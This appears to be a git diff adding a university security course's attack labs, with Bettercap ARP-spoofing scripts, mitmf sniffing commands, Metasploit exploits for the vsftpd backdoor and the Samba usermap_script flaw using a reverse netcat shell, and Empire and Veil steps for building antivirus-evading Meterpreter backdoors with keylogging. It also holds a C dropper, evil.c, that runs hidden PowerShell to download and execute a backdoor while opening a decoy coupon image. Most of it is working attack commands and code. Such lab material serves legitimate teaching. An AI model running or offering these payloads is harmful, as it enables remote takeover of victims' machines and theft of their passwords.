add FSCS728 lab

FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap

@@ -0,0 +1,6 @@
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.2.13
+arp.spoof on
+set net.sniff.local true
+net.sniff on

FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap

@@ -0,0 +1,5 @@
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.2.13
+arp.spoof on
+net.sniff on

FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT

@@ -0,0 +1,3 @@
+https://information.rapid7.com/download-metasploitable-2017.html
+
+poweroff

FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT

@@ -0,0 +1,14 @@
+arp -a //router's ip
+
+//install mitmf
+apt-get update
+apt-get install mitmf -y
+
+//attack
+mitmf --arp --spoof --gateway 10.0.2.1  --targets 10.0.2.15 -i eth0 
+mitmf --arp --spoof --gateway 10.0.2.1  --targets 10.0.2.15 -i eth0 --screen
+//-hsts
+
+//Website
+http://www.stealmylogin.com/demo.html
+http://w3schools.invisionzone.com/

FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT

@@ -0,0 +1,7 @@
+use exploit/unix/ftp/vsftpd_234_backdoor
+show options
+set RHOST 10.0.2.12
+exploit
+
+iptables -I INPUT -p tcp --dport 21 --syn -j LOG --log-prefix "TCP_SYN"
+grep -i "TCP_SYN" syslog

FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT

@@ -0,0 +1,12 @@
+https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
+msfconsole
+use exploit/multi/samba/usermap_script
+set RHOST 10.0.2.12 //set the target IP
+set RPORT 139 //set the target port
+
+set PAYLOAD cmd/unix/reverse_netcat
+
+set LHOST 10.0.2.10 //set the attaker IP
+set LPORT 2222 //set the attaker port
+
+exploit

FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt

@@ -0,0 +1,42 @@
+mkdir /var/www/html/empire_backdoor/
+mkdir empire_lab
+cd empire_lab
+git clone https://github.com/EmpireProject/Empire.git
+cd Empire/setup
+./install.sh
+cd ..exit
+./empire
+
+//create a listener
+listeners
+(optional) uselistener back<tab><tab>
+uselistener http
+(optional) info
+set Port 8081
+set Host http:://10.0.2.10:8081
+execute
+back
+list  //list listener
+
+
+//create a backdoor for Windows, we need to know how to communicate with Windows Powershell securly (stager)
+back  //back to top level
+//(optional): usestager
+usestager windows/launcher_bat
+set Listener http
+set OutFile /var/www/html/empire_backdoor/emipire_http_8081.bat
+execute
+
+
+Victim download the backdoor payload from the website (Window machine)
+service apache2 start (Kali start the website)
+(Window 10: open IE)
+10.0.2.7/empire_backdoor
+(click the rev_https_8080.exe and run anyway)
+
+//Access to victim's computer
+agents
+interact <name of the victim's computer>
+sysinfo
+
+

FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt

@@ -0,0 +1,110 @@
+Using veil-framework to Create a Backdoor
+
+1. Introduction
+Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions.
+
+Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers 
+and is extended over the network at runtime. 
+It communicates over the stager socket and provides a comprehensive client-side Ruby API. 
+It features command history, tab completion, channels, and more.
+Metepreter was originally written by skape for Metasploit 2.x, 
+common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. 
+
+Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework
+
+Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection.
+
+2. Check environment setting up. My Window IP: 10.0.2.8
+ipconfig
+
+b. in Kali (Password: toor). My Kali IP: 10.0.2.7
+ifconfig
+
+3. Install Veil in Kali. You need to open a Kail Terminator
+mkdir opt
+cd opt
+git clone https://github.com/Veil-Framework/Veil.git
+cd Veil
+cd config
+./setup.sh --force --silent (enter "y" if asks)
+(close the console)
+
+4. Attacker set payload options using Veil
+(open the console)
+cd /opt/Veil
+./Veil.py  (you should see the Veil interface now)
+list     (for two tools)
+use 1 (using Evasion tool)
+list (list all payloads)
+use 15 (go/meterpreter/rev_https.py)
+set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http)
+set LPORT 8080 (http port, don't use 80, avoid anti-virus program, sometime anti-virus scans the port)
+set PROCESSORS 1 (make backdoor process 1)
+set SLEEP 6
+options (see changed parameters)
+
+5. Attacker uses Veil to generate backdoor payload (executable) 
+generate (you should see interface)
+rev_https_8080 (backdoor name to remember easily)
+(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe)
+(optional: https://nodistribute.com/ to check if the backdoor will be detected)
+(close the console/Terminator)
+
+6. Attacker load the backdoor to website (On attacker's machine/Kali)
+(open a file folder)
+/ (allow you to type path)
+/var/www/html
+(create a folder evil-files)
+(control-N to open another file window)
+/usr/share/veil-output/compiled/  (you will see the backdoor file)
+(copy the .exe file to evil-files folder)
+(open Terminator)
+service apache2 start (start the website)
+
+7. Attacker listening incoming connection (Sever/Attacker side/Kali)
+(open another Terminator or split current Terminator)
+msfconsole (you should see interface)
+use exploit/multi/handler
+set PAYLOAD windows/meterpreter/reverse_https  (I will listen to the malicouse payload/program)
+show options (see all parameters for the payload)
+set LHOST 10.0.2.7  (this IP is my attack machine, I am waiting, e.g., reverse http)
+set LPORT 8080 (http port, don't use 80, the same setting)
+show options (see all parameters for the payload)
+exploit (Now attacker is listening)
+
+8. Victim download the backdoor payload from the website (Window machine)
+(open IE)
+10.0.2.7/evil-files
+(click the rev_https_8080.exe and run anyway)
+
+9. Access to victim’s machine
+(enter, you will see msg promote again)
+sessions -i 
+sessions -i 1
+sysinfo
+ps
+keyscan_start (enable key logger)
+(in Window VM, open facebook, type your password)
+keyscan_dump (what did you see?)
+keyscan_stop
+screenshot (what did you see)
+(you will see victim connects to the attacker)
+(restore snapshot)
+
+
+
+
+
+
+
+
+
+
+
+Reference
+https://www.udemy.com/learn-social-engineering-from-scratch/
+https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/
+https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
+https://www.youtube.com/watch?v=W1rCVyGwKQ4
+
+

FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT

@@ -0,0 +1,77 @@
+https://www.dropbox.com/s/snby65gmwh92esj/amazon_coupon_code_Vl8_icon.ico
+https://www.dropbox.com/s/gxh0ickzpr34t4o/amazon-coupon-code.jpg
+https://www.dropbox.com/s/b01iqpmb9vfslrp/autoit-download-and-execute.au3
+https://www.dropbox.com/s/03cvti4wgu0dx0l/rev_https_8080.zip
+
+ls /root/.set/reports/powershell/
+mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
+
+mv evil.exe /var/www/html/backdoor_image
+
+use multi/handler
+set PAYLOAD windows/meterpreter/reverse_https
+set LHOST 10.0.2.10
+set LPORT 8080
+exploit 
+
+
+
+
+
+
+
+
+
+
+Other useful commands
+
+powershell (new-object System.Net.WebClient).DownloadFile('http://www.xys.org/buttons/xys_cover.gif','C:\Users\IEUser\cover.gif')
+
+https://www.linkedin.com/pulse/go-hell-powershell-powerdown-attacks-kirtar-oza-cissp-cisa-ms-/
+
+https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
+
+ powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"
+
+"powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\""
+
+powershell.exe "IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))"
+
+gcc evil_image.c -o evil_image.exe
+
+
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+int main()
+{
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+char url[200]="";
+char shellCMD[400]="";
+printf("URL of a backdoor: ");
+//gets(str);
+
+strcat(url,"'");
+strcat(url,str);
+strcat(url,"'");
+
+printf(url);
+printf("\n");
+
+char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+strcat(shellCMD,shellCMD_head);
+strcat(shellCMD,url);
+strcat(shellCMD,",\'C:\\Users\\Public\\screenshot.exe\')");
+
+printf(shellCMD);
+getchar();
+
+
+//system("powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"");
+//system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(url, 'C:\\Users\\Public\\screenshot.exe') "); 
+system(shellCMD);
+system("powershell.exe start C:\\Users\\Public\\screenshot.exe"); 
+return 0;
+}

FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c

@@ -0,0 +1,101 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+/*
+system("powershell.exe \"IEX( (new-object net.webclient).downloadstring
+('http://10.0.2.10/payload.txt'))\"");
+system("powershell.exe -w hidden -c (new-object System.Net.WebClient).
+Downloadfile('http://10.0.2.10/payload.txt', 'C:\\Users\\Public\\screenshot.exe') ");
+system("powershell.exe start C:\\Users\\Public\\backdoor.exe"); 
+system("powershell.exe start C:\\Users\\Public\\coupon.jpg"); 
+*/
+
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc);
+void powershellcmdRun(char * shellCMDRun, char * outputLoc);
+char* insert_char_realloc (char *str, int len);
+
+int main()
+{
+
+
+//You need to make changes here
+char url_evil[200]="http://10.0.2.10/rev_https_8080.exe";
+char url_image[200]="http://10.0.2.10/amazon-coupon-code.jpg";
+//char url_evil[200]="https://pbs.twimg.com/profile_images/1057899591708753921/PSpUS-Hp_400x400.jpg"; //for test
+//char url_image[200]="https://pbs.twimg.com/profile_images/54789364/JPG-logo-highres_400x400.jpg"; //for testing
+char backdoorLoc[200]="C:\\Users\\Public\\backdoor.exe";
+char outputLoc_image[200]="C:\\Users\\Public\\coupon.jpg";
+
+
+
+// ==================download backdoor
+char shellCMD[400]="";
+powershellDownloadCmd(url_evil, shellCMD, backdoorLoc);
+//printf("URL: %s\n", shellCMD);
+system(shellCMD);
+
+//================== download image
+char shellCMD_image[400]="";
+powershellDownloadCmd(url_image, shellCMD_image, outputLoc_image);
+//printf("URL: %s\n", shellCMD_image);
+system(shellCMD_image);
+
+//=============execute backdoor
+char shellCMDRun[400]="";
+powershellcmdRun(shellCMDRun,  insert_char_realloc (backdoorLoc, strlen(backdoorLoc)));
+//printf("command: %s\n", shellCMDRun);
+system(shellCMDRun);
+
+//=============open an image
+char shellCMDRun_image[400]="";
+powershellcmdRun(shellCMDRun_image,  insert_char_realloc (outputLoc_image, strlen(outputLoc_image)));
+//printf("command: %s\n", shellCMDRun_image);
+system(shellCMDRun_image);
+
+return 0;
+}
+
+/* function returning a powershell command */
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc){
+  char url_with_quote[200]="";
+  strcat(url_with_quote,"'");
+  strcat(url_with_quote,url);
+  strcat(url_with_quote,"'");
+
+  char loc_with_quote[200]="";
+  strcat(loc_with_quote,",\'");
+  strcat(loc_with_quote,outputLoc);
+  strcat(loc_with_quote,"\')");
+
+
+  char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+  strcat(shellCMD,shellCMD_head);
+  strcat(shellCMD,url_with_quote);
+  strcat(shellCMD,loc_with_quote);
+}
+
+
+void powershellcmdRun(char * shellCMDRun, char * outputLoc){
+  char shellCMD_head[400]="\"powershell.exe start ";
+  strcat(shellCMDRun,shellCMD_head);
+  strcat(shellCMDRun,outputLoc);
+  strcat(shellCMDRun,"\"");
+}
+
+char* insert_char_realloc (char *str, int len){
+int i;
+int j=0;
+char * str_temp = (char *)malloc(len + 10);
+for (i=0;i<len;i++){
+  str_temp[j] = str[i];
+  if(str[i]=='\\'){
+     j++;	  
+     str_temp[j] = '\\';
+  }
+  j++;
+}
+return str_temp;
+}
+
+